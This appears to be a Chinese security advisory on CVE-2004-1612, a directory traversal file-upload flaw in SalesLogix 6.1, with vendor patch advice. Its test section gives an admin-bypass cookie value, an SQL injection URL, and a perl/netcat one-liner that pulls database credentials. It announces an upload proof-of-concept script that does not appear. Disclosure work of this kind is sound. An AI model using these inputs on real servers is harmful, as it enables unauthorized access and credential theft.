安全研究
安全漏洞
Best Software SalesLogix ProcessQueueFile文件上传漏洞
发布日期:2004-10-18
更新日期:2004-10-18
受影响系统:SalesLogix SalesLogix 6.1
描述:
BUGTRAQ ID:
11450
CVE(CAN) ID:
CVE-2004-1612
SalesLogix是客户关系管理解决方案。
Best Software SalesLogix 6.1存在目录遍历漏洞,远程攻击者通过ProcessQueueFile请求内的"..",利用此漏洞可上传任意文件。
<*来源:Carl
链接:
http://xforce.iss.net/xforce/xfdb/17765
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Admin authentication bypass cookie value:
slxweb=user=Admin|teams=ADMIN!|usertype=Administrator|
SQL Injection example:
http://www.example.com/scripts/slxweb.dll/view?name=coninfo&id=[SQL]
Revealing the database username and password:
perl -e 'print "\x0"x10 . "\x20" . "\x0"x3 .
"GetConnection\x0SALESLOGIX_SERVER\x0"' | netcat 1.2.3.4
1707
Finally the following script has been provided as a proof of concept for the file upload issue:
建议:
厂商补丁:
SalesLogix
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.saleslogix.com浏览次数:1761
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |